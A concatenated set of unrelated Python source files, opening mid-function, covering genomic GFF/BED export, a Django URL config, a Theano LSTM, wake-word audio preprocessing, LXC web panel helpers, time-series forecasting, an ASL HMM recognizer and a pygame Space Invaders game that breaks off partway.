qualifiers[BioCantorQualifiers.FEATURE_TYPE.value] = self.feature_types
return qualifiers
def to_gff(
self,
parent: Optional[str] = None,
parent_qualifiers: Optional[Dict[Hashable, Set[str]]] = None,
chromosome_relative_coordinates: bool = True,
raise_on_reserved_attributes: Optional[bool] = True,
) -> Iterable[GFFRow]:
"""Writes a GFF format list of lists for this feature.
The additional qualifiers are used when writing a hierarchical relationship back to files. GFF files
are easier to work with if the children features have the qualifiers of their parents.
Args:
parent: ID of the Parent of this transcript.
parent_qualifiers: Directly pull qualifiers in from this dictionary.
chromosome_relative_coordinates: Output GFF in chromosome-relative coordinates? Will raise an exception
if there is not a ``sequence_chunk`` ancestor type.
raise_on_reserved_attributes: If ``True``, then GFF3 reserved attributes such as ``ID`` and ``Name`` present
in the qualifiers will lead to an exception and not a warning.
Yields:
:class:`~biocantor.io.gff3.rows.GFFRow`
Raises:
NoSuchAncestorException: If ``chromosome_relative_coordinates`` is ``False`` but there is no
``sequence_chunk`` ancestor type.
GFF3MissingSequenceNameError: If there are no sequence names associated with this feature.
"""
if not self.sequence_name:
raise GFF3MissingSequenceNameError("Must have sequence names to export to GFF3.")
if not chromosome_relative_coordinates and not self.has_ancestor_of_type(SequenceType.SEQUENCE_CHUNK):
raise NoSuchAncestorException(
"Cannot export GFF in relative coordinates without a sequence_chunk ancestor."
)
qualifiers = self.export_qualifiers(parent_qualifiers)
feature_id = str(self.guid)
attributes = GFFAttributes(
id=feature_id,
qualifiers=qualifiers,
name=self.feature_name,
parent=parent,
raise_on_reserved_attributes=raise_on_reserved_attributes,
)
# "transcript" (feature interval) feature
row = GFFRow(
self.sequence_name,
GFF_SOURCE,
BioCantorFeatureTypes.FEATURE_INTERVAL,
(self.start if chromosome_relative_coordinates else self.chunk_relative_start) + 1,
self.end if chromosome_relative_coordinates else self.chunk_relative_end,
NULL_COLUMN,
self.strand,
CDSPhase.NONE,
attributes,
)
yield row
# start adding exon features
# re-use qualifiers, updating ID each time
if chromosome_relative_coordinates:
blocks = zip(self._genomic_starts, self._genomic_ends)
else:
blocks = [[x.start, x.end] for x in self.relative_blocks]
for i, (start, end) in enumerate(blocks, 1):
attributes = GFFAttributes(
id=f"feature-{feature_id}-{i}",
qualifiers=qualifiers,
name=self.feature_name,
parent=feature_id,
raise_on_reserved_attributes=raise_on_reserved_attributes,
)
row = GFFRow(
self.sequence_name,
GFF_SOURCE,
BioCantorFeatureTypes.FEATURE_INTERVAL_REGION,
start + 1,
end,
NULL_COLUMN,
self.strand,
CDSPhase.NONE,
attributes,
)
yield row
def to_bed12(
self,
score: Optional[int] = 0,
rgb: Optional[RGB] = RGB(0, 0, 0),
name: Optional[str] = "feature_name",
chromosome_relative_coordinates: bool = True,
) -> BED12:
"""Write a BED12 format representation of this :class:`FeatureInterval`.
Both of these optional arguments are specific to the BED12 format.
Args:
score: An optional score associated with a interval. UCSC requires an integer between 0 and 1000.
rgb: An optional RGB string for visualization on a browser. This allows you to have multiple colors
on a single UCSC track.
name: Which identifier in this record to use as 'name'. feature_name to guid. If the supplied string
is not a valid attribute, it is used directly.
chromosome_relative_coordinates: Output GFF in chromosome-relative coordinates? Will raise an exception
if there is not a ``sequence_chunk`` ancestor type.
Return:
A :class:`~biocantor.io.bed.BED12` object.
Raises:
NoSuchAncestorException: If ``chromosome_relative_coordinates`` is ``False`` but there is no
``sequence_chunk`` ancestor type.
"""
if chromosome_relative_coordinates:
blocks = list(zip(self._genomic_starts, self._genomic_ends))
num_blocks = len(self._genomic_starts)
else:
blocks = [[x.start, x.end] for x in self.relative_blocks]
num_blocks = self.chunk_relative_location.num_blocks
block_sizes = [end - start for start, end in blocks]
block_starts = [start - self.start for start, _ in blocks]
if chromosome_relative_coordinates:
start = self.start
end = self.end
else:
start = self.chunk_relative_start
end = self.chunk_relative_end
return BED12(
self.sequence_name,
start,
end,
getattr(self, name, name),
score,
self.strand,
0, # thickStart always 0 for non-coding
0, # thickEnd always 0 for non-coding
rgb,
num_blocks,
block_sizes,
block_starts,
)
| nilq/baby-python | python |
from django.urls import url
from .views import SignUpView,ProfilePageView, ProfileEditPageView
urlpatterns = [
url(r'', SignUpView.as_view(), name='signup'),
url(r'profile/$', ProfilePageView.as_view(), name='profile'),
url(r'profile_edit/$', ProfileEditPageView, name='profile_edit')
] | nilq/baby-python | python |
#!/usr/bin/python
import numpy as np
import theano
import theano.tensor as T
import reberGrammar
dtype = theano.config.floatX
# SET the random number generator's seeds for consistency
SEED = 123
np.random.seed(SEED)
# refer to the tutorial
# http://christianherta.de/lehre/dataScience/machineLearning/neuralNetworks/LSTM.php
# http://deeplearning.net/tutorial/code/lstm.py
# activation function for others
tanh = T.tanh
# activation function for gates
sigma = lambda x: 1 / (1 + T.exp(-x))
# lstm unit - extended version include forget gate and peephole weights
def lstm_step(x_t,m_t,h_tm1,c_tm1, # changes: add m_t for mask variable at time step t
W_x,W_h,W_c,W_co,W_hy,
b_i,b_f,b_c,b_o,b_y):
h_dim = h_tm1.shape[-1] # hidden unit dimension
def _slice(_x,n,dim):
return _x[:,n * dim:(n + 1) * dim]
# improve efficiency
preact_x = T.dot(x_t,W_x)
preact_h = T.dot(h_tm1,W_h)
preact_c = T.dot(c_tm1,W_c)
# input gate
i_t = T.nnet.sigmoid(_slice(preact_x,0,h_dim) + _slice(preact_h,0,h_dim) + _slice(preact_c,0,h_dim) + b_i)
# forget gate
f_t = T.nnet.sigmoid(_slice(preact_x,1,h_dim) + _slice(preact_h,1,h_dim) + _slice(preact_c,1,h_dim) + b_f)
# cell
c_t = f_t * c_tm1 + i_t * tanh(_slice(preact_x,3,h_dim) + _slice(preact_h,3,h_dim) + b_c)
c_t = m_t[:,None] * c_t + (1. - m_t)[:,None] * c_tm1 # add mask
# output gate
o_t = T.nnet.sigmoid(_slice(preact_x,2,h_dim) + _slice(preact_h,2,h_dim ) + T.dot(c_t,W_co) + b_o)
# cell output
h_t = o_t * tanh(c_t)
h_t = m_t[:,None] * h_t + (1. - m_t)[:,None] * h_tm1 # add mask
# output
y_t = T.nnet.sigmoid(theano.dot(h_t,W_hy) + b_y)
return [h_t,c_t,y_t]
# random initialization of weights
def init_weights(size_x,size_y):
values = np.ndarray([size_x,size_y],dtype=dtype)
for dx in xrange(size_x):
vals = np.random.uniform(low=-1.,high=1.,size=(size_y,))
values[dx,:] = vals
_,svs,_ = np.linalg.svd(values)
# svs[0] is the largest singular value
values = values / svs[0]
return values
# get minibatches' index and shuffle the dataset at each iteration, taken from the lstm.py
def get_minibatches_idx(n,minibatch_size, shuffle=False):
idx_list = np.arange(n,dtype="int32")
if shuffle:
np.random.shuffle(idx_list)
minibatches = []
minibatch_start = 0
for i in range( n // minibatch_size):
minibatches.append(idx_list[minibatch_start:minibatch_start + minibatch_size])
minibatch_start += minibatch_size
if (minibatch_start != n):# make a minibatch out of what is left
minibatches.append(idx_list[minibatch_start:])
return zip(range(len(minibatches)),minibatches)
# claim numpy array object
def numpy_floatX(data):
return np.asarray(data, dtype=dtype)
#------------------ test case -----------------------
# instantiate a lstm network for reber grammar
n_in = 7
n_hidden = n_i = n_c = n_o = n_f = 10
n_y = 7
# initialize weights
W_x = theano.shared(init_weights(n_in,n_hidden*4))
W_h = theano.shared(init_weights(n_hidden,n_hidden*5))
W_c = theano.shared(init_weights(n_hidden,n_hidden*2))
W_co = theano.shared(init_weights(n_hidden,n_hidden))
W_hy = theano.shared(init_weights(n_hidden, n_y))
b_i = theano.shared(np.cast[dtype](np.random.uniform(-0.5,.5,size=n_i)))
b_f = theano.shared(np.cast[dtype](np.random.uniform(0,1.,size=n_f)))
b_c = theano.shared(np.zeros(n_c,dtype=dtype))
b_o = theano.shared(np.cast[dtype](np.random.uniform(-0.5,.5,size=n_o)))
b_y = theano.shared(np.zeros(n_y,dtype=dtype))
params = [W_x,W_h,W_c,W_co,W_hy,b_i,b_f,b_c,b_o,b_y]
# input
v = T.tensor3(dtype=dtype)
n_samples = v.shape[1]
# mask
m = T.matrix(dtype=dtype)
target = T.tensor3(dtype=dtype)
# sequential model
[h_vals,_,y_vals],_ = theano.scan(fn = lstm_step,
sequences = [v,m],
outputs_info = [T.alloc(numpy_floatX(0.),n_samples,n_hidden),
T.alloc(numpy_floatX(0,),n_samples,n_hidden),None],
non_sequences = [W_x,W_h,W_c,W_co,W_hy,b_i,b_f,b_c,b_o,b_y])
# cost
cost = -T.mean(target * T.log(y_vals) + (1. - target) * T.log(1. - y_vals))
# learning rate
lr = np.cast[dtype](.1)
learning_rate = theano.shared(lr)
gparams = []
for param in params:
gparam = T.grad(cost,param)
gparams.append(gparam)
updates = []
for param,gparam in zip(params,gparams):
updates.append((param,param - gparam * learning_rate))
#---------------- change data format and padding
# generate data
train_data = reberGrammar.get_n_embedded_examples(1000)
num_samples = len(train_data)
lengths = [] #counter for sequence length
for j in range(len(train_data)):
i,o = train_data[j]
lengths.append(len(i))
maxlen = max(lengths)
# zero padding by the maximum length of seqs
train_input = np.zeros((maxlen,num_samples,n_in),dtype=np.float32)
train_mask = np.zeros((maxlen,num_samples),dtype=np.float32)
train_tgt = np.zeros((maxlen,num_samples,n_in),dtype=np.float32)
for j in range(num_samples):
i,o = train_data[j]
train_input[:lengths[j],j] = np.vstack(i)
train_tgt[:lengths[j],j] = np.vstack(o)
train_mask[:lengths[j],j] = 1
#----------------------------------------------------
learn_rnn_fn = theano.function(inputs = [v,m,target],
outputs = cost,
updates = updates)
#-----------------Apply minibatch
nb_epochs = 250
batch_size = 50 # mini-batch size
train_err = np.ndarray(nb_epochs)
def train_rnn(train_data):
for epo in range(nb_epochs):
print "training epoch ",str(epo),"..."
error = 0.
kf = get_minibatches_idx(num_samples,batch_size,shuffle=True)
for _,train_idx in kf:
x = train_input[:,train_idx,:]
y = train_tgt[:,train_idx,:]
m = train_mask[:,train_idx]
train_cost = learn_rnn_fn(x,m,y) # modified function
error += train_cost
train_err[epo] = error
train_rnn(train_data)
#-----------------------------------------------------
# plot results
import matplotlib.pyplot as plt
plt.plot(np.arange(nb_epochs),train_err,'b-')
plt.xlabel('epochs')
plt.ylabel('error')
plt.ylim(0.50)
| nilq/baby-python | python |
import os
import sys
import time
import json
import h5py
import argparse
import librosa
import numpy as np
from tqdm import tqdm
from glob import glob
from typing import Any
from tf_lite.filter import Filter
from tf_lite.tf_lite import TFLiteModel
import webrtcvad
class Dataset_Filter:
def __init__(self,
dataset: str,
filter: TFLiteModel,
**kwargs: Any) -> None:
# dataset variables
self.dataset = dataset
self.audio_metadata = json.load(open(dataset, 'r'))
self.wake_word = kwargs['wake_word']
self.speakers_dict = self.map_speakers()
# audio parameters
self.sr = kwargs['sample_rate']
self.fw = kwargs['frame_width']
self.hw = kwargs['hop_width']
self.frame_len = self.sr // 1000 * self.fw
self.hop_len = self.sr // 1000 * self.hw
# filter class variables
self.filter = Filter(fft_hop_length=self.hw, model_dir=args.models_dir)
self.num_filter_outputs = self.filter.num_outputs()
# data locations
self.out_dir = kwargs['out_dir']
self.data_dir = kwargs['data_dir']
# make directory structure for dataset
os.makedirs(self.out_dir, exist_ok=True)
self.dataset_file = os.path.join(self.out_dir, os.path.basename(dataset).replace('.json', '.h5'))
# voice activity detector (0=lowest aggresiveness, 3=most agressive)
self.vad = webrtcvad.Vad(3)
def map_speakers(self):
speakers = set()
for data in self.audio_metadata:
speakers.add(data['worker_id'])
speaker_dict = {speaker: i for i, speaker in enumerate(speakers)}
return speaker_dict
def filter_audio_file(self, audio_file: str, label: int) -> None:
features = []
# load audio from file
samples, _ = librosa.load(os.path.join(self.data_dir, audio_file), sr=self.sr)
# if wav file is empty, return None
if len(samples) > 0:
# start and end timesteps for voice in audio clip
speech_start_ts = -1
speech_end_ts = -1
# frame audio and process it through filter
for start_idx in np.arange(0, len(samples), self.frame_len):
frame = samples[start_idx:start_idx+self.frame_len]
if len(frame) < self.frame_len:
pad_len = self.frame_len - len(frame)
frame = np.pad(frame, (0,pad_len), mode='constant')
# convert frame to bytes for WEBRTCVAD
frame_bytes = np.int16(frame * 32768).tobytes()
is_speech = self.vad.is_speech(frame_bytes, self.sr)
# find timestep where speech starts
if speech_start_ts == -1 and is_speech:
speech_start_ts = start_idx // self.hop_len
## find timestep where speech ends
if speech_start_ts > -1 and is_speech:
speech_end_ts = (start_idx + self.frame_len) // self.hop_len
# filter audio through filter model
frame = self.filter.filter_frame(frame)
# if frame buffer is not full, filter cannot do overlapping windows, so nothing is returned
if len(frame) > 0:
features.extend(frame)
#if (speech_start_ts == -1 or speech_end_ts == -1) and label==1:
# print(f'Error finding begining and ending of speech in: {audio_file}')
return {'file_name': os.path.basename(audio_file).replace('.wav',''),
'is_hotword': label,
'features': np.array(features),
'speech_start_ts': speech_start_ts,
'speech_end_ts': speech_end_ts
}
return None
def filter_dataset_audio(self) -> None:
audio_clips = []
# process all audio files in dataset's json file
for audio in tqdm(self.audio_metadata):
# pass audio file through filter model
audio_clip = self.filter_audio_file(audio['audio_file_path'], audio['is_hotword'])
# dont save empty feature maps (i.e. the audio file had too few samples)
if audio_clip is None or len(audio_clip['features']) == 0:
continue
audio_clip['speaker'] = self.speakers_dict[audio['worker_id']]
audio_clips.append(audio_clip)
self.write_h5(audio_clips)
def write_h5(self, audio_clips):
print(f"Writing preprocessed dataset to {self.dataset_file}")
with h5py.File(self.dataset_file, 'w') as h5f:
for audio_clip in audio_clips:
dset = h5f.create_dataset(audio_clip['file_name'], data=audio_clip['features'])
dset.attrs['is_hotword'] = audio_clip['is_hotword']
dset.attrs['speaker'] = audio_clip['speaker']
dset.attrs['speech_start_ts'] = audio_clip['speech_start_ts']
dset.attrs['speech_end_ts'] = audio_clip['speech_end_ts']
def parse_args():
parser = argparse.ArgumentParser(description='Builds and saves dataset arrays from Hey Snips audio data')
parser.add_argument('--models_dir', type=str, default='utils/tf_lite', help='directory with TF-Lite filter model')
parser.add_argument('--data_dir', type=str, default='data/hey_snips_research_6k_en_train_eval_clean_ter',
help='Directory with Hey Snips raw dataset')
parser.add_argument('--out_dir', type=str, default='data', help='Directory to save datasets to')
parser.add_argument('--sample_rate', type=int, default=16000, help='Sample rate for audio (Hz)')
parser.add_argument('--frame_width', type=int, default=20, help='Frame width for audio in (ms)')
parser.add_argument('--hop_width', type=int, default=10, help='Hop width for audio in (ms)')
parser.add_argument('-wake_word', type=str, default='hey-snips', help='Wake work in dataset')
args = parser.parse_args()
assert os.path.exists(args.data_dir), 'Location of dataset was not found!'
return args
def main(args) -> int:
start = time.time()
filter = Filter(model_dir=args.models_dir)
# load, filter and save features of each audio file in dataset
for dataset in glob(os.path.join(args.data_dir, '*.json')):
print(f"Loading and preprocessing {os.path.basename(dataset).replace('.json', '')} dataset using metadata from {dataset}")
dataset_filter = Dataset_Filter(dataset, filter, **vars(args))
dataset_filter.filter_dataset_audio()
print(f'Script completed in {time.time()-start:.2f} secs')
return 0
if __name__ == '__main__':
args = parse_args()
sys.exit(main(args))
| nilq/baby-python | python |
import sys
import hmac
import time
import crypt
import hashlib
import sqlite3
import ConfigParser
from flask import session, render_template, g, flash, redirect, url_for, request, jsonify
"""
cgroup_ext is a data structure where for each input of edit.html we have an array with:
position 0: the lxc container option to be saved on file
position 1: the regex to validate the field
position 2: the flash message to display on success.
"""
ip_regex = '^(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])$'
cidr_regex = '^(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])(\/(\d|[1-2]\d|3[0-2]))*$'
file_match = '^[\w.-/]+$'
cgroup_ext = {
'arch': ['lxc.arch', '^(x86|i686|x86_64|amd64)$', ''],
'utsname': ['lxc.utsname', '^[\w.-]+$', 'Hostname updated'],
'type': ['lxc.network.type', '^(none|empty|veth|vlan|macvlan|phys)$', 'Link network type updated'],
'link': ['lxc.network.link', '^[\w.-/]+$', 'Link name updated'],
'flags': ['lxc.network.flags', '^(up|down)$', 'Network flag updated'],
'hwaddr': ['lxc.network.hwaddr', '^[0-9a-fA-F:]+$', 'Hardware address updated'],
'ipv4': ['lxc.network.ipv4', cidr_regex, 'IPv4 address updated'],
'ipv4gw': ['lxc.network.ipv4.gateway', ip_regex, 'IPv4 gateway address updated'],
'ipv6': ['lxc.network.ipv6', '^([0-9a-fA-F:/]+)+$', 'IPv6 address updated'], # weak ipv6 regex check
'ipv6gw': ['lxc.network.ipv6.gateway', '^([0-9a-fA-F:]+)+$', 'IPv6 gateway address updated'],
'script_up': ['lxc.network.script.up', file_match, 'Network script down updated'],
'script_down': ['lxc.network.script.down', file_match, 'Network script down updated'],
'rootfs': ['lxc.rootfs', file_match, 'Rootfs updated'],
'memlimit': ['lxc.cgroup.memory.limit_in_bytes', '^([0-9]+|)$', 'Memory limit updated'],
'swlimit': ['lxc.cgroup.memory.memsw.limit_in_bytes', '^([0-9]+|)$', 'Swap limit updated'],
'cpus': ['lxc.cgroup.cpuset.cpus', '^[0-9,-]+$', 'CPUs updated'],
'shares': ['lxc.cgroup.cpu.shares', '^[0-9]+$', 'CPU shares updated'],
'deny': ['lxc.cgroup.devices.deny', '^$', '???'],
'allow': ['lxc.cgroup.devices.allow', '^$', '???'],
'loglevel': ['lxc.loglevel', '^[0-9]$', 'Log level updated'],
'logfile': ['lxc.logfile', file_match, 'Log file updated'],
'id_map': ['lxc.id_map', '^[ug0-9 ]+$', 'UID Mapping updated'],
'hook_pre_start': ['lxc.hook.pre-start', file_match, 'Pre hook start updated'],
'hook_pre_mount': ['lxc.hook.pre-mount', file_match, 'Pre mount hook updated'],
'hook_mount': ['lxc.hook.mount', file_match, 'Mount hook updated'],
'hook_start': ['lxc.hook.start', file_match, 'Container start hook updated'],
'hook_post_stop': ['lxc.hook.post-stop', file_match, 'Container post hook updated'],
'hook_clone': ['lxc.hook.clone', file_match, 'Container clone hook updated'],
'start_auto': ['lxc.start.auto', '^(0|1)$', 'Autostart saved'],
'start_delay': ['lxc.start.delay', '^[0-9]*$', 'Autostart delay option updated'],
'start_order': ['lxc.start.order', '^[0-9]*$', 'Autostart order option updated']
}
# configuration
config = ConfigParser.SafeConfigParser()
try:
# TODO: should really use with statement here rather than rely on cpython reference counting
config.readfp(open('/etc/lwp/lwp.conf'))
except:
# TODO: another blind exception
print(' * missed /etc/lwp/lwp.conf file')
try:
# fallback on local config file
config.readfp(open('lwp.conf'))
except:
print(' * cannot read config files. Exit!')
sys.exit(1)
def connect_db(db_path):
"""
SQLite3 connect function
"""
return sqlite3.connect(db_path)
def query_db(query, args=(), one=False):
cur = g.db.execute(query, args)
rv = [dict((cur.description[idx][0], value) for idx, value in enumerate(row)) for row in cur.fetchall()]
return (rv[0] if rv else None) if one else rv
def if_logged_in(function=render_template, f_args=('login.html', )):
"""
helper decorator to verify if a user is logged
"""
def decorator(handler):
def new_handler(*args, **kwargs):
if 'logged_in' in session:
return handler(*args, **kwargs)
else:
return function(*f_args)
new_handler.func_name = handler.func_name
return new_handler
return decorator
def get_bucket_token(container):
query = query_db("SELECT bucket_token FROM machine WHERE machine_name=?", [container], one=True)
if query is None:
return ""
else:
return query['bucket_token']
def hash_passwd(passwd):
return hashlib.sha512(passwd).hexdigest()
def get_token():
return hashlib.md5(str(time.time())).hexdigest()
def check_session_limit():
if 'logged_in' in session and session.get('last_activity') is not None:
now = int(time.time())
limit = now - 60 * int(config.get('session', 'time'))
last_activity = session.get('last_activity')
if last_activity < limit:
flash(u'Session timed out !', 'info')
session.pop('logged_in', None)
session.pop('token', None)
session.pop('last_activity', None)
session.pop('username', None)
session.pop('name', None)
session.pop('su', None)
flash(u'You are logged out!', 'success')
else:
session['last_activity'] = now
def api_auth():
"""
api decorator to verify if a token is valid
"""
def decorator(handler):
def new_handler(*args, **kwargs):
token = request.args.get('private_token')
if token is None:
token = request.headers.get('Private-Token')
if token:
result = query_db('select * from api_tokens where token=?', [token], one=True)
if result is not None:
#token exists, access granted
return handler(*args, **kwargs)
else:
return jsonify(status="error", error="Unauthorized"), 401
else:
return jsonify(status="error", error="Unauthorized"), 401
new_handler.func_name = handler.func_name
return new_handler
return decorator
def check_htpasswd(htpasswd_file, username, password):
htuser = None
lines = open(htpasswd_file, 'r').readlines()
for line in lines:
htuser, htpasswd = line.split(':')
if username == htuser:
break
if htuser is None:
return False
else:
return hmac.compare_digest(crypt.crypt(password, htpasswd), htpasswd)
| nilq/baby-python | python |
import numpy as np
import pandas as pd
# generate a daily signal covering one year 2016 in a pandas dataframe
N = 365
np.random.seed(seed=1960)
df_train = pd.DataFrame({"Date" : pd.date_range(start="2016-01-25", periods=N, freq='D'),
"Signal" : (np.arange(N)//40 + np.arange(N) % 21 + np.random.randn(N))})
# print(df_train.head(N))
import pyaf.ForecastEngine as autof
# create a forecast engine. This is the main object handling all the operations
lEngine = autof.cForecastEngine()
# get the best time series model for predicting one week
lEngine.train(iInputDS = df_train, iTime = 'Date', iSignal = 'Signal', iHorizon = 7);
lEngine.getModelInfo() # => relative error 7% (MAPE)
# predict one week
df_forecast = lEngine.forecast(iInputDS = df_train, iHorizon = 7)
# list the columns of the forecast dataset
print(df_forecast.columns) #
# print the real forecasts
# Future dates : ['2017-01-19T00:00:00.000000000' '2017-01-20T00:00:00.000000000' '2017-01-21T00:00:00.000000000' '2017-01-22T00:00:00.000000000' '2017-01-23T00:00:00.000000000' '2017-01-24T00:00:00.000000000' '2017-01-25T00:00:00.000000000']
print(df_forecast['Date'].tail(7).values)
# signal forecast : [ 9.74934646 10.04419761 12.15136455 12.20369717 14.09607727 15.68086323 16.22296559]
print(df_forecast['Signal_Forecast'].tail(7).values)
| nilq/baby-python | python |
import warnings
from asl_data import SinglesData
def recognize(models: dict, test_set: SinglesData):
""" Recognize test word sequences from word models set
:param models: dict of trained models
{'SOMEWORD': GaussianHMM model object, 'SOMEOTHERWORD': GaussianHMM model object, ...}
:param test_set: SinglesData object
:return: (list, list) as probabilities, guesses
both lists are ordered by the test set word_id
probabilities is a list of dictionaries where each key a word and value is Log Liklihood
[{SOMEWORD': LogLvalue, 'SOMEOTHERWORD' LogLvalue, ... },
{SOMEWORD': LogLvalue, 'SOMEOTHERWORD' LogLvalue, ... }]
guesses is a list of the best guess words ordered by the test set word_id
['WORDGUESS0', 'WORDGUESS1', 'WORDGUESS2',...]
"""
warnings.filterwarnings("ignore", category=DeprecationWarning)
probabilities = [] #dict of {possible_word: logL}
guesses = [] #best guesses
# TODO implement the recognizer
for word_id in range(test_set.num_items):
word_logL_dict = {} #dict
X, lengths = test_set.get_all_Xlengths()[word_id]
for word in models:
hmm_model = models[word]
try: #if the hmmlearn library can score the model
logL = hmm_model.score(X, lengths)
except: #if the hmmlearn library cannot score the model
logL = float('-inf')
word_logL_dict[word] = logL
probabilities.append(word_logL_dict)
guesses.append(max(word_logL_dict, key = lambda k: word_logL_dict[k])) #best guess according to logL
return probabilities, guesses | nilq/baby-python | python |
from django.template.loaders.app_directories import Loader as AppDirectoriesLoader
from .mixins import TemplateMinifierMixin
class Loader(TemplateMinifierMixin, AppDirectoriesLoader):
pass
| nilq/baby-python | python |
import pygame
from pygame import mixer
from pygame import time
from pygame.locals import *
import random
pygame.mixer.pre_init(44100, -16, 2, 512)
mixer.init()
pygame.font.init()
# define fps
clock = pygame.time.Clock()
fps = 60
screen_width = 600
screen_height = 800
screen = pygame.display.set_mode((screen_width, screen_height))
pygame.display.set_caption('Space Invaders')
# define fonts
font30 = pygame.font.SysFont('Constantia', 30)
font40 = pygame.font.SysFont('Constantia', 40)
# load sounds
explosion_fx = pygame.mixer.Sound("img/explosion.wav")
explosion_fx.set_volume(0.25)
explosion2_fx = pygame.mixer.Sound("img/explosion2.wav")
explosion2_fx.set_volume(0.25)
laser_fx = pygame.mixer.Sound("img/laser.wav")
laser_fx.set_volume(0.25)
# define game variables
rows = 5
cols = 5
alien_cooldown = 1000 # bullet cooldown(ms)
last_alien_shot = pygame.time.get_ticks()
countdown = 3
last_count = pygame.time.get_ticks()
game_over = 0 # 0 means no 'game over' :: 1 means player has won :: -1 means player has lost
# define colors
red = (255, 0, 0)
green = (0, 255, 0)
white = (255, 255, 255)
# load image
bg = pygame.image.load("img/bg.png")
def draw_bg():
screen.blit(bg, (0, 0))
# define function for creating text
def draw_text(text, font, text_col, x, y):
img = font.render(text, True, text_col)
screen.blit(img, (x, y))
# create spaceship class
class Spaceship(pygame.sprite.Sprite):
def __init__(self, x, y, health):
pygame.sprite.Sprite.__init__(self)
self.image = pygame.image.load("img/ship.png")
self.rect = self.image.get_rect()
self.rect.center = [x, y]
self.health_start = health
self.health_remaining = health
self.last_shot = pygame.time.get_ticks()
def update(self):
# set movement speed
speed = 8
# set cooldown variable
cooldown = 500 # milliseconds
game_over = 0
# get key press
key = pygame.key.get_pressed()
if key[pygame.K_LEFT] and self.rect.left > 0:
self.rect.x -= speed
if key[pygame.K_RIGHT] and self.rect.right < screen_width:
self.rect.x += speed
# record current time
time_now = pygame.time.get_ticks()
# shoot
if key[pygame.K_SPACE] and time_now - self.last_shot > cooldown:
laser_fx.play()
bullet = Bullets(self.rect.centerx, self.rect.top)
bullet_group.add(bullet)
self.last_shot = time_now
# update mask
self.mask = pygame.mask.from_surface(self.image)
# draw health bar
pygame.draw.rect(
screen, red, (self.rect.x, (self.rect.bottom + 10), self.rect.width, 15))
if self.health_remaining > 0:
pygame.draw.rect(screen, green, (self.rect.x, (self.rect.bottom + 10), int(
self.rect.width * (self.health_remaining / self.health_start)), 15))
elif self.health_remaining <= 0:
explosion = Explosion(self.rect.centerx, self.rect.centery, 3)
explosion_group.add(explosion)
self.kill()
game_over = -1
return game_over
# create bullets class
class Bullets(pygame.sprite.Sprite):
def __init__(self, x, y):
pygame.sprite.Sprite.__init__(self)
self.image = pygame.image.load("img/bullet.png")
self.rect = self.image.get_rect()
self.rect.center = [x, y]
def update(self):
self.rect.y -= 5
if self.rect.bottom < 0:
self.kill()
if pygame.sprite.spritecollide(self, alien_group, True):
self.kill()
explosion_fx.play()
explosion = Explosion(self.rect.centerx, self.rect.centery, 2)
explosion_group.add(explosion)
# create aliens class
class Aliens(pygame.sprite.Sprite):
def __init__(self, x, y):
pygame.sprite.Sprite.__init__(self)
self.image = pygame.image.load(
"img/alien" + str(random.randint(1, 5)) + ".png")
self.rect = self.image.get_rect()
self.rect.center = [x, y]
self.move_counter = 0
self.move_direction = 1
def update(self):
self.rect.x += self.move_direction
self.move_counter += 1
if abs(self.move_counter) > 75:
self.move_direction *= -1
self.move_counter *= self.move_direction
# create Alien Bullets class
class Alien_Bullets(pygame.sprite.Sprite):
def __init__(self, x, y):
pygame.sprite.Sprite.__init__(self)
self.image = pygame.image.load("img/alien_bullet.png")
self.rect = self.image.get_rect()
self.rect.center = [x, y]
def update(self):
self.rect.y += 2
if self.rect.top > screen_height:
self.kill()
if pygame.sprite.spritecollide(self, spaceship_group, False, pygame.sprite.collide_mask):
self.kill()
explosion2_fx.play()
# reduce player health
spaceship.health_remaining -= 1
explosion = Explosion(self.rect.centerx, self.rect.centery, 1)
explosion_group.add(explosion)
# create explosion class
class Explosion(pygame.sprite.Sprite):
def __init__(self, x, y, size):
pygame.sprite.Sprite.__init__(self)
self.images = []
for num in range(1, 6):
img = pygame.image.load(f"img/exp{num}.png")
if size == 1:
img = pygame.transform.scale(img, (20, 20))
if size == 2:
img = pygame.transform.scale(img, (40, 40))
if size == 3:
img = pygame.transform.scale(img, (160, 160))
# add img to the list
self.images.append(img)
self.index = 0
self.image = self.images[self.index]
self.rect = self.image.get_rect()
self.rect.center = [x, y]
self.counter = 0
def update(self):
explosion_speed = 3
# update explosion animation
self.counter += 1
if self.counter >= explosion_speed and self.index < len(self.images) - 1:
self.counter = 0
self.index += 1
self.image = self.images[self.index]
# if animation is complete, delete explosion
if self.index >= len(self.images) - 1 and self.counter >= explosion_speed:
self.kill()
# create sprite groups
spaceship_group = pygame.sprite.Group()
bullet_group = pygame.sprite.Group()
alien_group = pygame.sprite.Group()
alien_bullet_group = pygame.sprite.Group()
explosion_group = pygame.sprite.Group()
def create_aliens():
# generate aliens
for row in range(rows):
for item in range(cols):
alien = Aliens(100 + item * 100, 100 + row * 70)
alien_group.add(alien)
create_aliens()
# create player
spaceship = Spaceship(screen_width // 2, screen_height - 100, 3)
spaceship_group.add(spaceship)
run = True
while run:
clock.tick(fps)
# draw background
draw_bg()
if countdown == 0:
# create random alien bullets
# record current time
time_now = pygame.time.get_ticks()
# shoot
if time_now - last_alien_shot > alien_cooldown and len(alien_bullet_group) < 5 and len(alien_group) > 0:
attacking_alien = random.choice(alien_group.sprites())
alien_bullet = Alien_Bullets(
attacking_alien.rect.centerx, attacking_alien.rect.bottom)
alien_bullet_group.add(alien_bullet)
last_alien_shot = time_now
# check if all aliens have been destroyed
if len(alien_group) == 0:
game_over = 1
if game_over == 0:
# update spaceship
game_over = spaceship.update()
# update sprite groups
bullet_group.update()
alien_group.update()
alien_bullet_group.update()
else:
if game_over == -1:
draw_text('YOU LOST, ACK!!!', font40, white, int(
screen_width / 2 - 110), int(screen_height / 2 + 50))
if game_over == 1:
draw_text('YOU WIN!!!', font40, white, int(
screen_width / 2 - 110), int(screen_height / 2 + 50))
if countdown > 0:
draw_text('GET READY!', font40, white, int(
screen_width / 2 - 110), int(screen_height / 2 + 50))
draw_text(str(countdown), font40, white, int(
screen_width / 2 - 10), int(screen_height / 2 + 100))
count_timer = pygame.time.get_ticks()
if count_timer - last_count > 1000:
countdown -= 1
last_count = count_timer
# update explosion group
explosion_group.update()
# draw sprite groups
spaceship_group.draw(screen)
